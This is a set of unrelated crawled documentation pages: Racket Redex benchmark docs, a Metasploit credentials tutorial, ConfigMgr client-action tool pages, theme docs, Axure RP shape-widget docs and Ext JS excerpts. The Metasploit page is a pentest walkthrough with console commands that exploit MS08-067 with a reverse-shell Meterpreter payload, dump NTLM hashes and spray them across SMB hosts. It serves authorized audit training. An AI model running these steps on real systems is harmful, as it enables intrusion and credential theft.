Why do most of the Joomla! PHP files start with "defined('_JEXEC')...? From Joomla! Documentation Almost all of the PHP files in Joomla! begin with this check, shown below. It is a security measure: the _JEXEC constant is only defined when the file is loaded through the Joomla! framework, so a request that tries to run the file directly simply dies instead of executing the code outside the framework. Note, this line should NOT be included in your main index.php file, since this is the program that starts the Joomla! session.
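In most Joomla! versions the guard is written like this (the message passed to die varies from file to file):

defined('_JEXEC') or die('Restricted access');

If the file is reached through the Joomla! framework, _JEXEC is already defined and the statement does nothing; if the file is requested directly, the script dies before any other code runs.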
https://docs.joomla.org/index.php?title=Why_do_most_of_the_Joomla!_PHP_files_start_with_%22defined('_JEXEC')...%3F&oldid=74122
2015-08-28T06:12:37
CC-MAIN-2015-35
1440644060413.1
[]
docs.joomla.org
Difference between revisions of "JModelAdmin::getItem"Item Description Method to get a single record. Description:JModelAdmin::getItem [Edit Descripton] public function getItem ($pk=null) - Returns mixed Object on success, false on failure. - Defined on line 273 of libraries/joomla/application/component/modeladmin.php - Since See also JModelAdmin::getItem source code on BitBucket Class JModelAdmin Subpackage Application - Other versions of JModelAdmin::getItem SeeAlso:JModelAdmin::getItem [Edit See Also] User contributed notes <CodeExamplesForm />
https://docs.joomla.org/index.php?title=API17:JModelAdmin::getItem&diff=cur&oldid=57359
2015-08-28T06:16:53
CC-MAIN-2015-35
1440644060413.1
[]
docs.joomla.org
Adding a new menu item From Joomla! Documentation Revision as of 03:16, 6 July 2008 by Jonflgiles A menu item is a link to content. Menus are constructed of multiple menu items. To add a new menu item: - Log in to the Joomla! Back-end Administrator. - Select the menu you wish to add an item to by clicking on the correct menu in the list in the Menus toolbar menu. - Alternately click Menus > Menu Manager on the toolbar menu and then click the Edit Menu Item(s) icon in the appropriate row of the Menu Manager screen. - Click the New toolbar button to open the Menu Item: New screen. - Select the appropriate menu item type. For example to insert a single Article select Internal Link > Articles > Article Layout. - Complete the Menu Item Details section as required: - Title: This is what is displayed when the menu item is published. - Alias: Used for the SEF features of Joomla!
https://docs.joomla.org/index.php?title=Adding_a_new_menu_item&oldid=8997
2015-08-28T06:24:58
CC-MAIN-2015-35
1440644060413.1
[]
docs.joomla.org
Difference between revisions of "Scheduling an Article to be available only between certain dates" From Joomla! Documentation Latest revision as of 10:25, 28 February 2011 To publish an Article within a specific time frame you do as follows: - Log into the Administrator's Panel - Create a new entry or select an Article in the Content -> Article Manager - While editing article contents you will see the options as shown in the figure below: - Set the Start Publishing and Finish Publishing Dates. This will cause the article to only be published for the specified time period. Scheduling an Article should produce a file icon as seen below: Notes: - The scheduling of articles is not limited to just the back-end administrator's panel. It can also be completed via the front-end administrator's panel as well. - Not setting either area means that the article will always show up until you either turn if off or delete it. - If you only set the Start Date and not the Finish Date, then Joomla! will begin displaying the article on the beginning date given but it will never stop showing the article until you either turn it off or delete it. - If you only set the Finish Date and not the Start Date, then Joomla! will show the article as soon as you have turned it on and will stop showing the article once the ending date has been reached. - If you use both the Start Date and the Finish Date then the article will show up only between the beginning date and the ending date. - If you set the Start Date after the Finish Date then the article will never show up. So if you have created articles and they are not showing up, please check your Start Date and Finish Date settings to ensure sure you have not done this.
https://docs.joomla.org/index.php?title=Scheduling_an_Article_to_be_available_only_between_certain_dates&diff=37631&oldid=8863
2015-08-28T06:06:20
CC-MAIN-2015-35
1440644060413.1
[]
docs.joomla.org
Difference between revisions of "JCache::get" Description Get cached data by id and group. Description:JCache::get [Edit Descripton] public function get ( $id $group=null ) - Returns mixed Boolean false on failure or a cached data string - Defined on line 160 of libraries/joomla/cache/cache.php - Since See also SeeAlso:JCache::get [Edit See Also] User contributed notes <CodeExamplesForm />
https://docs.joomla.org/index.php?title=API17:JCache::get&diff=94813&oldid=46768
2015-08-28T06:20:16
CC-MAIN-2015-35
1440644060413.1
[]
docs.joomla.org
Revision history of "JTableLanguage/11.1" View logs for this page There is no edit history for this page. This page has been deleted. The deletion and move log for the page are provided below for reference. - 21:22, 10 May 2013 JoomlaWikiBot (Talk | contribs) moved page JTableLanguage/11.1 to API17:JTableLanguage without leaving a redirect (Robot: Moved page)
https://docs.joomla.org/index.php?title=JTableLanguage/11.1&action=history
2015-08-28T05:36:44
CC-MAIN-2015-35
1440644060413.1
[]
docs.joomla.org
Because a FINALLY clause may be entered and exited through the exception handling mechanism or through normal program control, the explicit control flow of your program may not be followed. When the FINALLY is entered through the exception handling mechanism, it is not possible to exit the clause with BREAK, CONTINUE, or EXIT - when the finally clause is being executed by the exception handling system, control must return to the exception handling system.

program Produce;

procedure A0;
begin
  try
    (* try something that might fail *)
  finally
    break;
  end;
end;

begin
end.

The program above attempts to exit the finally clause with a break statement. It is not legal to exit a FINALLY clause in this manner.

program Solve;

procedure A0;
begin
  try
    (* try something that might fail *)
  finally
  end;
end;

begin
end.

The only solution to this error is to restructure your code so that the offending statement does not appear in the FINALLY clause.
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/cm_cant_leave_finally_xml.html
2012-05-27T02:59:04
crawl-003
crawl-003-017
[]
docs.embarcadero.com
The CLR requires that property accessors be methods, not fields. The Delphi language allows you to specify fields as property accessors. The Delphi compiler will generate the necessary methods behind the scenes. CLS recommends a specific naming convention for property accessor methods: get_propname and set_propname. If the accessors for a property are not methods, or if the given methods do not match the CLS name pattern, the Delphi compiler will attempt to generate methods with CLS conforming names. If a method already exists in the class that matches the CLS name pattern, but it is not associated with the particular property, the compiler cannot generate a new property accessor method with the CLS name pattern. If the given property's accessors are methods, name collisions prevent the compiler from producing a CLS conforming name, but does not prevent the property from being usable. However, if a name conflict prevents the compiler from generating an accessor method for a field accessor, the property is not usable and you will receive this error.
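As a sketch with invented names, a property whose accessors are already methods named with the CLS get_/set_ pattern needs no generated accessors, while a field-backed property makes the compiler generate them behind the scenes:

type
  TCounter = class
  private
    FValue: Integer;
    FTotal: Integer;
    function get_Value: Integer;
    procedure set_Value(AValue: Integer);
  public
    // Method accessors that already follow the CLS naming pattern.
    property Value: Integer read get_Value write set_Value;
    // Field accessors: the compiler must generate get_Total and set_Total itself.
    property Total: Integer read FTotal write FTotal;
  end;

function TCounter.get_Value: Integer;
begin
  Result := FValue;
end;

procedure TCounter.set_Value(AValue: Integer);
begin
  FValue := AValue;
end;

If the class already declared an unrelated method named get_Total or set_Total, the compiler could not generate the accessor for Total, and the error described above would be reported for that property.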
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/cm_cant_gen_prop_accessor_xml.html
2012-05-27T02:57:34
crawl-003
crawl-003-017
[]
docs.embarcadero.com
Transaction types via configuration files This documentation does not apply to the most recent version of Splunk. Click here for the latest version. Contents Transaction types via configuration files Any series of events can be turned into a transaction type. Read more about use cases in how transaction types work. You can create transaction types via transactiontypes.conf. See below for configuration details. For more information on configuration files in general, see how configuration files work. Configuration

1. Define a stanza in transactiontypes.conf for each transaction type. The stanza name is the name of the transaction type, and it can contain the following attributes:

[<transactiontype>]
maxspan = [<integer> s|m|h|d]
maxpause = [<integer> s|m|h|d]
maxrepeats = <integer>
fields = <comma-separated list of fields>
exclusive = <true | false>
aliases = <comma-separated list of alias=event_type>
pattern = <ordered pattern of named aliases>
match = closest

2. Set values for the attributes:

maxspan = [<integer> s|m|h|d]
- The maximum time span of the transaction.
- If there is no "pattern" set (below), defaults to 5m. Otherwise, defaults to -1 (unlimited).

maxpause = [<integer> s|m|h|d]
- The maximum pause allowed between the events of a transaction.

maxrepeats = <integer>

fields = <comma-separated list of fields>

exclusive = <true | false>
- Setting to 'false' causes the matcher to look for multiple matches for each event and approximately doubles the processing time.
- Defaults to "true".

aliases = <comma-separated list of alias=event_type>
- Define a short-hand alias for an eventtype to be used in pattern (below).
- For example, A=login, B=purchase, C=logout means "A" is equal to eventtype=login, "B" to "purchase", "C" to "logout".
- Defaults to "".

pattern = <regular expression-like pattern>
- Defines the pattern of event types in events making up the transaction.
- Uses aliases to refer to eventtypes.
- For example, "A, B, B, C" means this transaction consists of a "login" event, followed by two "purchase" events, followed by a "logout" event.
- Defaults to "".

match = closest
- Specify the match type to use.
- Currently, the only value supported is "closest".
- Defaults to "closest".

3. Use the transaction command in Splunk Web to call your defined transaction (by its transaction type name). You can override configuration specifics during search. Read more about transaction.
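For example, a hypothetical transaction type that groups web store events for a user session might be defined like this (the stanza name, values, and field names are made up):

[web_purchase]
maxspan = 10m
maxpause = 1m
fields = userid, JSESSIONID
exclusive = true

It could then be invoked from the search bar by name, along the lines of: sourcetype=access_combined | transaction web_purchase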
http://docs.splunk.com/Documentation/Splunk/3.4.14/Admin/TransactionTypesViaConfigurationFiles
2012-05-27T00:22:27
crawl-003
crawl-003-017
[]
docs.splunk.com
tags.conf This documentation does not apply to the most recent version of Splunk. Click here for the latest version. Contents # Copyright (C) 2005-2008 Splunk Inc. All Rights Reserved. Version 3.0 # # This is an example of a tags.conf file. Use this file to create, disable, and delete tags for field values. # Use this file in tandem with props.conf. # # To use one or more of these configurations, copy the configuration block into tags.conf # in $SPLUNK_HOME/etc/system/local/. You must restart Splunk to enable configurations and configuration changes.
http://docs.splunk.com/Documentation/Splunk/3.4.14/Admin/Tagsconf
2012-05-27T00:22:10
crawl-003
crawl-003-017
[]
docs.splunk.com
Note: An event type must be configured via eventtypes.conf or saved in order to be tagged. Configuration Tag an event type from within Splunk Web. Note: Make sure you have enabled the eventtype field from the fields drop down menu. - Click on the drop-down arrow next to the eventtype field. - Select Tag event type. - The Tag This Field dialog box pops up. - Enter your tags and click save. Once you have tagged an event type, you can search for it in the search bar with the eventtypetag preface, as shown in the example below.
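For instance, if you tagged one or more event types with a tag named firewall (a made-up name), a search along these lines would return only events whose event type carries that tag:

eventtypetag="firewall" denied OR dropped

This lets you group several related event types under a single search term.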
http://docs.splunk.com/Documentation/Splunk/3.4.14/Admin/TagEventTypes
2012-05-27T00:20:35
crawl-003
crawl-003-017
[]
docs.splunk.com
anomalies This documentation does not apply to the most recent version of Splunk. Click here for the latest version. anomalies Synopsis Computes an unexpectedness score for an event. Syntax anomalies [threshold=num] [labelonly=bool] [normalize=bool] [maxvalues=int] [field=field] [blacklist=filename] [blacklistthreshold=num] [by-clause] Arguments - threshold - Datatype: <num> - Description: - labelonly - Datatype: <bool> - Description: - normalize - Datatype: <bool> - Description: - maxvalues - Datatype: <int> - Description: - field - Datatype: <field> - Description: - blacklist - Datatype: <filename> - Description: - blacklistthreshold - Datatype: <num> - Description: Description Determines the degree of unexpectedness of an event's field value, based on the previous maxvalue events. By default it removes events that are well expected (unexpectedness > threshold). The default threshold is 0.01. If labelonly is true, no events are removed, and the unexpectedness attribute is set on all events. The field analyzed by default is _raw. By default, normalize is true, which normalizes numerics. For cases where field contains numeric data that should not be normalized, but treated as categories, set normalize=false. The blacklist is a name of a csv file of events in splunk_home/var/run/splunk/BLACKLIST.csv, such that any incoming events that are similar to the blacklisted events are treated as not anomalous (i.e., uninteresting) and given an unexpectedness score of 0.0. Events that match blacklisted events with a similarity score above blacklistthreshold (defaulting to 0.05) are marked as unexpected. The inclusion of a 'by' clause, allows the specification of a list of fields to segregate results for anomaly detection. for each combination of values for the specified field(s), events with those values are treated entirely separately. therefore, 'anomalies by source' will look for anomalies in each source separately -- a pattern in one source will not affect that it is anomalous in another source. Examples Example 1: Show most interesting events first, ignoring any in the blacklist 'boringevents'. ... | anomalies blacklist=boringevents | sort -unexpectedness Example 2: Use with transactions to find regions of time that look unusual. ... | transam maxpause=2s | anomalies Example 3: Return only anomalous events. ... | anomalies See also anomalousvalue, cluster, kmeans, out.
http://docs.splunk.com/Documentation/Splunk/4.0.1/SearchReference/Anomalies
2012-05-26T16:19:42
crawl-003
crawl-003-017
[]
docs.splunk.com
Examples Example 1: Analyze the numerical fields to predict the value of "is_activated". ... | af classfield=is_activated.
http://docs.splunk.com/Documentation/Splunk/4.0.1/SearchReference/Af
2012-05-26T16:19:22
crawl-003
crawl-003-017
[]
docs.splunk.com
(which should be the only non-static item defined in the module file):

void initspam()
{
    (void) Py_InitModule("spam", SpamMethods);
}

When embedding Python, call initspam() directly after the call to Py_Initialize() or PyMac_Initialize():

int main(int argc, char **argv)
{
    /* Pass argv[0] to the Python interpreter */
    Py_SetProgramName(argv[0]);

    /* Initialize the Python interpreter.  Required. */
    Py_Initialize();

    /* Add a static module */
    initspam();

A more substantial example module is included in the Python source distribution as Modules/xxmodule.c. This file may be used as a template or simply read as an example.
http://docs.python.org/release/1.5.2p2/ext/methodTable.html
2012-05-26T16:19:40
crawl-003
crawl-003-017
[]
docs.python.org
crawl.conf This documentation does not apply to the most recent version of Splunk. Click here for the latest version. Contents crawl.conf crawl.conf.example # Copyright (C) 2005-2008 Splunk Inc. All Rights Reserved. Version 3.0 # # crawl.conf.spec # Copyright (C) 2005-2008 Splunk Inc. All Rights Reserved. Version 3.0 # #" [default] logging = <warn | error | info | debug> * Set crawl's logging level -- affects the logs in * Defaults to warn. [crawlers] * This stanza enumerates all the available crawlers. * Follow this stanza name with a list of crawlers. crawlers_list = <comma-separated list of crawlers> * Create the crawlers below, in a stanza with the crawler name as the stanza header. [file_crawler] * Set crawler-specific attributes under this stanza header. * Follow this stanza name with any of the following attributes. * The stanza name is the crawler name for crawlers_list (above). tha match the patterns. * There is an implied "$" (end of file name) after each pattern. * Defaults to: *~, *#, *,v, *readme*, *install, (/|^).*, *passwd*, *example*, *makefile, core.* packed_extensions_list = <comma-separated list of extensions> * Specify extensions of compressed files to include. *.
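As a minimal illustration, a crawl.conf in $SPLUNK_HOME/etc/system/local/ might contain something like the following; the extension list is an arbitrary example rather than a recommended value:

[default]
logging = warn

[crawlers]
crawlers_list = file_crawler

[file_crawler]
packed_extensions_list = gz, tgz, tar, zip

This defines a single file crawler and keeps warning-level logging for crawl activity.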
http://docs.splunk.com/Documentation/Splunk/3.4.10/admin/Crawlconf
2012-05-26T17:18:43
crawl-003
crawl-003-017
[]
docs.splunk.com
Help Center Local Navigation BlackBerry Smartphone Simulator The BlackBerry®® MDS Simulator and the BlackBerry® Email Simulator are available for this purpose. To get the BlackBerry Smartphone Simulator, visit and download the BlackBerry® Java® Development Environment or the BlackBerry Java Development Environment Component Package. Was this information helpful? Send us your comments.
http://docs.blackberry.com/en/developers/deliverables/5827/The_BB_Smrtphn_simulator_447179_11.jsp
2012-05-26T22:50:31
crawl-003
crawl-003-017
[]
docs.blackberry.com
Help Center Local Navigation Search This Document Using BlackBerry Messenger with a BlackBerry Application You can integrate a BlackBerry® Java® Application with the BlackBerry® Messenger application. This could be useful if you are creating a turn-based game application for the BlackBerry device. To create a BlackBerry Java Application that integrates with the BlackBerry Messenger application, you can use the classes in the net.rim.blackberry.api.blackberrymessenger package. For more information about using the BlackBerryMessenger class, see the BlackBerry API Reference . Was this information helpful? Send us your comments.
http://docs.blackberry.com/en/developers/deliverables/5827/Using_BB_Messenger_with_a_BB_application_447286_11.jsp
2012-05-26T22:50:43
crawl-003
crawl-003-017
[]
docs.blackberry.com
Help Center Local Navigation Using listeners to respond to application changes A BlackBerry® Java® Application can register change listeners on the email and organizer data stores and in the phone application. The listeners allow the BlackBerry Java Application to take immediate action when the BlackBerry device user performs a local event. You can use the email and organizer data listeners to notify a BlackBerry Java Application when new entries arrive or when the BlackBerry device user makes changes such as additions, deletions, or updates, to the existing data. You can use phone listeners to listen for phone call actions, such as the initiation of new calls or calls ending. Was this information helpful? Send us your comments.
http://docs.blackberry.com/en/developers/deliverables/5827/Using_listeners_to_respond_to_application_changes_447148_11.jsp
2012-05-26T22:50:49
crawl-003
crawl-003-017
[]
docs.blackberry.com
restart your Splunk server to read the new changes in.. You can also add Splunk to your path.
http://docs.splunk.com/Documentation/Splunk/3.4.8/admin/EnableHTTPS
2012-05-27T01:53:01
crawl-003
crawl-003-017
[]
docs.splunk.com
Receiving via Splunk Web Enable receiving via Splunk Web. - Navigate to Splunk Web on the server that will receive data for indexing. - Click the Admin link in the upper right hand corner of Splunk Web. - Select the Distributed tab. - Click Receive Data. - To begin receiving data: - Set the radio button to Yes. - Specify the port that you want Splunk to listen on. This is also the port that Splunk instances use to forward data to this server. - Click the Save button to commit the configuration. Restart Splunk for your changes to take effect. via Splunk CLI Enable receiving from Splunk's CLI. To use Splunk's CLI, navigate to the $SPLUNK_HOME/bin/ directory and use the ./splunk command. Also, add Splunk to your path and use the splunk command. You will need to restart the Splunk Server for your changes to take effect. Forwarding You must first configure your receiving Splunk host using the instructions above before configuring forwarders. via Splunk Web Enable forwarding via Splunk Web. - Navigate to Splunk Web on the server that will be forwarding data for indexing. - Click the Admin link in the upper right-hand corner of Splunk Web. - Select the Distributed tab. - Click Forward Data. To begin forwarding data: - Set the Forward data to other Splunk Servers? radio button to Yes. - Specify whether you want to keep a copy of the data local in addition to forwarding or just forward. Keeping a local copy allows you to search from the local server, but requires more space and memory. - Specify the Splunk server(s) and port number to forward data to. The port number should be the same one that you specified when you configured receiving. - Click the Save button to commit the configuration. Restart Splunk for your changes to take effect. via Splunk CLI Enable forwarding from the Splunk CLI. Navigate to your $SPLUNK_HOME/bin directory on the forwarding server and log in to the CLI. Also add Splunk to your path and use the splunk command. ./splunk login Splunk username: admin Password: To enable forwarding: # ./splunk add forward-server <host:port> -auth admin:changeme where <host:port> are the hostname and port of the Splunk server to which this forwarder or light forwarder should send data. To disable forwarding: # ./splunk remove forward-server <host:port> -auth admin:changeme
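If you would rather use configuration files than the CLI, forwarding can also be defined in outputs.conf on the forwarding instance; the stanza below is a sketch with a placeholder indexer address, and the attribute names follow later Splunk versions, so check the reference for your release:

[tcpout]
defaultGroup = my_indexers

[tcpout:my_indexers]
server = indexer.example.com:9997

The port must match the one you enabled for receiving on the indexing server.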
http://docs.splunk.com/Documentation/Splunk/3.4.8/admin/EnableForwardingAndReceiving#Receiving
2012-05-27T01:52:56
crawl-003
crawl-003-017
[]
docs.splunk.com
Set host statically for every event in the same input, or dynamically with regex or segment on the full path of the source. To assign a different host for different sources or sourcetypes in the same input, extract host per event. Statically This method assigns the same host for every event for the input. Also, this will only impact new data coming in via the input. If you need to correct the host displayed in Splunk Web for data that has already been indexed, you will need to tag hosts instead. Via configuration files For more information, read how configuration files work. Configuration:

[<inputtype>://<path>]
host = $YOUR_HOST
sourcetype = $YOUR_SOURCETYPE
source = $YOUR_SOURCE

Learn more about input types. An example stanza is shown below.
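Filling in the template, a hypothetical stanza that statically assigns a host to a monitored directory could look like this:

[monitor:///var/log/httpd]
host = webserver01.example.com
sourcetype = access_combined

Every new event indexed from that input will then carry webserver01.example.com in its host field.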
http://docs.splunk.com/Documentation/Splunk/3.4.8/admin/DefineHostAssignmentForAnInput
2012-05-27T01:52:34
crawl-003
crawl-003-017
[]
docs.splunk.com
Set up alerts via savedsearches.conf This documentation does not apply to the most recent version of Splunk. Click here for the latest version. Set up alerts via savedsearches.conf.
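As a rough sketch only, a scheduled search with an email alert might be defined along these lines; the search, schedule, and address are placeholders, and the attribute names follow later Splunk versions, so the syntax for this release may differ:

[Errors in the last hour]
search = error OR failed
enableSched = 1
cron_schedule = 0 * * * *
actions = email
action.email.to = [email protected]

The search runs on the schedule and the email action delivers its results to the listed address.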
http://docs.splunk.com/Documentation/Splunk/3.4.9/Admin/SetUpAlertsViaSavedsearchesconf
2012-05-27T03:14:16
crawl-003
crawl-003-017
[]
docs.splunk.com
Plan a deployment This documentation does not apply to the most recent version of Splunk. Click here for the latest version. Contents Plan a deployment If you've got Splunk instances serving a variety of different populations within your organization, chances are their configurations vary depending on who uses them and for what purpose. You may have some number Splunk instances serving the helpdesk team, configured with a specific app to accelerate troubleshooting of Windows desktop issues. You may have another group of Splunk instances in use by your operations staff, set up with a few different apps designed specially to emphasize tracking of network issues, security incidents, and email traffic management. A third group of Splunk instances might serve the Web hosting group within the operations team. Rather than having to manage and maintain these divergent Splunk instances one at a time, you can put them into groups based on their usage, identify the various configurations and apps needed by each group, and then use the deployment server to handle updating their various apps and configurations as needed. You can group your Splunk instances for easier management when using the deployment server. You might simply have your Splunk instances grouped by OS or hardware type, by version, or by geographical location or timezone. Configuration overview For the great majority of deployment server configurations, you'll do the following: - Designate one of your Splunk servers as the deployment server. Group the deployment clients into "server classes". A server class defines the content that is pushed out to the clients that belong to it. A given deployment client can belong to multiple server classes at the same time. A deployment server can also be a deployment client of itself, as long as the location you specify for the client to get the content from is different from the location it is supposed to put retrieved content into. - The deployment server will hold the serverclass.conf file that defines the server classes that your deployment clients belong to. It will also hold the repository of content (Apps, configurations) to be pushed out. Refer to "Define server classes" in this manual for details. - You can tell each server class you define to get its content from a particular location and to put it into a particular location when it gets it. - Each deployment client will have a deploymentclient.conf that specifies what deployment server it should communicate with, the specific location on that server from which it should pick up content, and where it should put it locally. Refer to "Configure deployment clients" in this manual for details. - For more complex deployments, you can edit tenants.conf. This allows you to define multiple deployment servers, and redirect incoming client requests to them using rules you specify. Refer to "Deploy in multi-tenant environments" in this manual for more information about configuring tenants.conf. Most deployment server topologies don't require that you touch tenants.conf, however. Note: The deployment server and its deployment clients must agree in the SSL setting for their spl the instances of Splunk. Once you've got it up and configured, you just need to use the CLI reload command as described in "Deploy or update Apps and configurations".
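To make this concrete, a hypothetical serverclass.conf on the deployment server might group the operations hosts and hand them a single app; the class name, host pattern, and app name are invented, and the attribute names follow later Splunk versions:

[serverClass:OpsServers]
whitelist.0 = *.ops.example.com

[serverClass:OpsServers:app:netmon]
stateOnClient = enabled
restartSplunkd = true

Deployment clients whose host names match the whitelist pull the netmon app and restart splunkd after installing it.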
http://docs.splunk.com/Documentation/Splunk/4.0.1/Admin/Planadeployment
2012-05-27T02:51:31
crawl-003
crawl-003-017
[]
docs.splunk.com
. If you get stuck, Splunk's CLI has built-in help. Access the main CLI help by typing splunk help. Individual commands have their own help pages as well -- type splunk help <command>. CLI commands for input configuration The following commands are available for input configuration via the CLI: Change the configuration of each data input type by setting additional parameters. Parameters are set via the syntax: -parameter value. Note: You can only set one -hostname, -hostregex or -hostsegmentnum per command. Example 1. monitor files in a directory The following example shows how to monitor files in /var/log/: Add /var/log/ as a data input: ./splunk add monitor /var/log/ Example 2. monitor windowsupdate.log The following example shows how to monitor the Windows Update log (where Windows logs automatic updates):.
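Building on Example 1, several of these parameters can be combined in a single command; the path, host name, and source type values here are placeholders:

./splunk add monitor /var/log/secure -hostname webserver01 -sourcetype linux_secure

This monitors the file continuously and stamps each new event with the given host and source type, just as if you had set them in Splunk Web.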
http://docs.splunk.com/Documentation/Splunk/4.0.1/Admin/MonitorfilesanddirectoriesusingtheCLI
2012-05-27T02:51:18
crawl-003
crawl-003-017
[]
docs.splunk.com
Monitor files and directories This documentation does not apply to the most recent version of Splunk. Click here for the latest version. Contents Monitor files and directories Splunk has two file input processors: monitor and upload. For the most part, you can use monitor to add all your data sources from files and directories. However, you may want to use upload when you want to add one-time inputs, such as an archive of historical data. This topic discusses how to add monitor and upload inputs using Splunk Web and the configuration files. You can also add, edit, and list monitor inputs using the CLI; for more information, read this topic. How monitor works in Splunk Specify a path to a file or directory and Splunk's monitor processor consumes any new input. This is how you'd monitor live application logs such as those coming from J2EE or .Net applications, Web access logs, and so on. Splunk will continue to index the data in this file or directory as it comes in. You can also specify a mounted or shared directory, including network filesystems, as long as the Splunk server can read from the directory. If the specified directory contains subdirectories, Splunk recursively examines them for new files. Splunk checks for the file or directory specified in a monitor configuration on Splunk server start and restart. If the file or directory specified is not present on start, Splunk checks for it again in 24 intervals from the time of the last restart. Subdirectories of monitored directories are scanned continuously. To add new inputs without restarting Splunk, use Splunk Web or the command line interface. If you want Splunk to find potential new inputs automatically, use crawl. When using monitor: - the following common archive file types: .tar, .gz, .bz2, .tar.bz2 , and .zip. - Splunk detects log file rotation and does not process renamed files it has already indexed (with the exception of .tar and .gz archives; for more information see "Log file rotation" in this manual). - The entire dir/filename path must not exceed 1024 characters. - Set the sourcetype for directories to Automatic. If the directory contains multiple files of different formats, do not set a value for the source type manually. Manually setting a source type forces a single source type for all files in that directory. - same directory or file. If you want to see changes in a directory, use file system change monitor. If you want to index new events in a directory, use monitor. Note: Monitor input stanzas may not overlap. That is, monitoring /a/path while also monitoring /a/path/subdir will produce unreliable results. Similarly, monitor input stanzas which watch the same directory with different whitelists, blacklists, and wildcard components are not supported. Why use upload or batch Use the Upload a local file or Index a file on the Splunk server options to index a static file one time. The file will not be monitored on an ongoing basis.. Monitor files and directories in Splunk Web Add inputs from files and directories via Splunk Web. 1. Click Manager in the upper right-hand corner of Splunk Web. 2. Under System configurations, click Data Inputs. 3. Click Files and directories. 4. Click New to add an input. 5. Choose the radio button you want. You can: - Monitor a file or directory, which sets up an ongoing input--whenever more data is added to this file or directory, Splunk will index it. - Upload a local file from your local machine into Splunk. 
- Index a file on the Splunk server, which copies a file on the server into Splunk via the batch directory. 6. Specify the path to the file or directory. If you select Upload a local file, use the Browse... button. To monitor a shared network drive, enter the following: <myhost>/<mypath> (or \\<myhost>\<mypath> on Windows). Make sure Splunk has read access to the mounted drive as well as the files you wish to monitor. 7. Under the Host heading, select the host name. You have several choices if you are using Monitor or Batch methods. Learn more about setting host value. Note: Host only sets the host field in Splunk. It does not direct Splunk to look on a specific host on your network. 8. Now set the Source Type. Source type is a default field added to events. Source type is used to determine processing characteristics such as timestamps and event boundaries. 9. After specifying the source, host, and source type, click Submit. Monitor files and directories with inputs.conf You can also configure inputs by defining input stanzas in inputs.conf; read about configuration files in this manual before you begin. You can set any number of attributes and values following an input type. If you do not specify a value for one or more attributes, Splunk uses the defaults that are preset in $SPLUNK_HOME/etc/system/default/. Note: To ensure new events are indexed when you copy over an existing file with new contents, set CHECK_METHOD = modtime in props.conf for the source. This checks the modtime of the file and re-indexes when it changes. Note that the entire file is indexed, which can result in duplicate events. The following are options that you can use in both monitor and batch input stanzas. See the sections following for more attributes that are specific to each type of input. host = <string> - Set the host value of your input to a static value. host= is automatically prepended to the value when this shortcut is used. - Defaults to the IP address or fully qualified domain name of the host where the data originated. index = <string> - Set the index where events from this input will be stored. index= is automatically prepended to the value when this shortcut is used. - Defaults to main (or whatever you have set as your default index). - For more information about the index field, see "How indexing works" in this manual; for more information about source types, see "About sourcetypes". host_regex = <regular expression> - If specified, the regex extracts host from the filename of each input. - Specifically, the first group of the regex is used as the host. - Defaults to the default host= attribute if the regex fails to match. host_segment = <integer> - If specified, the '/'-separated path segment at that position is set as the host. - Defaults to the default host:: attribute if the value is not an integer, or is less than 1. Monitor syntax and examples Monitor input stanzas direct Splunk to watch all files in the <path> (or just <path> itself if it represents a single file). You must specify the input type and then the path, so put three slashes in your path if you're starting at root. You can use wildcards for the path. For more information, read how to "Specify input paths with wildcards". [monitor://<path>] <attribute1> = <val1> <attribute2> = <val2> ... The following are additional attributes you can use when defining monitor input stanzas. crcSalt = <string> - If set, this string is added to the CRC. - Use this setting to force Splunk to consume files that have matching CRCs. - If set to crcSalt = <SOURCE> (note: This setting is case sensitive), then the full source path is added to the CRC. followTail = 0|1 - If set to 1, monitoring begins at the end of the file (like tail -f). 
- This only applies to files the first time they are picked up. - After that, Splunk's internal file position records keep track of the file. _whitelist = <regular expression> - If set, files from this path are monitored only if they match the specified regex. _blacklist = <regular expression> - If set, files from this path are NOT monitored if they match the specified regex. Example 1. To load anything in /apache/foo/logs or /apache/bar/logs, etc.: [monitor:///apache/.../logs] Example 2. To load anything in /apache/ that ends in .log: [monitor:///apache/*.log] Batch syntax and examples Use batch input stanzas to load files one time; Splunk consumes the files destructively. Note: source = <string> and <KEY> = <string> are not used by batch. Example: This example batch loads all files from the directory /system/flight815/. [batch://system/flight815/*] move_policy = sinkhole
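To see how these attributes combine, here is a hypothetical inputs.conf monitor stanza (a minimal sketch; the path, index name, host_segment value, and whitelist regex are illustrative assumptions rather than values from this topic):
[monitor:///var/log/webfarm/.../apache]
# Send events to a non-default index (assumes an index named "web" exists).
index = web
# Use the third '/'-separated path segment ("webfarm" here) as the host value.
host_segment = 3
# Only monitor files whose names end in .log.
_whitelist = \.log$
# Read new files from the beginning instead of starting at the end.
followTail = 0
As in the examples above, the three slashes after monitor: indicate that the path starts at the root of the filesystem.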
http://docs.splunk.com/Documentation/Splunk/4.0.1/Admin/Monitorfilesanddirectories
2012-05-27T02:51:14
crawl-003
crawl-003-017
[]
docs.splunk.com
Monitor changes to your filesystem Caution: Do not configure the file system change monitor to monitor your root filesystem. This can be dangerous and time-consuming if directory recursion is enabled.
http://docs.splunk.com/Documentation/Splunk/4.0.1/Admin/Monitorchangestoyourfilesystem
2012-05-27T02:51:10
crawl-003
crawl-003-017
[]
docs.splunk.com
Monitor Windows Registry data Splunk supports the capture of Windows registry settings and lets you monitor changes to the registry. You can know when registry entries are added, updated, and deleted. When a registry entry is changed, Splunk captures the name of the process that made the change and the key path from the hive to the entry being changed. The Windows registry input monitor application runs as a process called splunk-regmon.exe. Warning: Do not stop or kill the splunk-regmon.exe process manually; this could result in system instability. To stop the process, stop the Splunk server process from the Windows Task Manager or from within Splunk Web. Enable Registry monitoring in Splunk Web Splunk on Windows comes with Registry monitoring configured but disabled by default. You can perform a one-time baseline index and then separately enable ongoing monitoring for machine and/or user keys. To do this: 1. In Splunk Web, click Manager in the upper right corner. 2. Click Data inputs > Registry Monitoring. 3. Choose Machine keys or User keys and enable the baseline and ongoing monitoring as desired. 4. Click Save. How it works: the details Windows registries can be extremely dynamic (thereby generating a great many events). Splunk provides a two-tiered configuration for fine-tuning the filters that are applied to the registry event data coming into Splunk. Splunk Windows registry monitoring uses two configuration files to determine what to monitor on your system, sysmon.conf and regmon-filters.conf, both located in $SPLUNK_HOME\etc\system\local\. These configuration files work as a hierarchy: sysmon.conf contains global settings for which event types (adds, deletes, renames, and so on) to monitor, which regular expression filters from the regmon-filters.conf file to use, and whether or not Windows registry events are monitored at all. regmon-filters.conf contains the 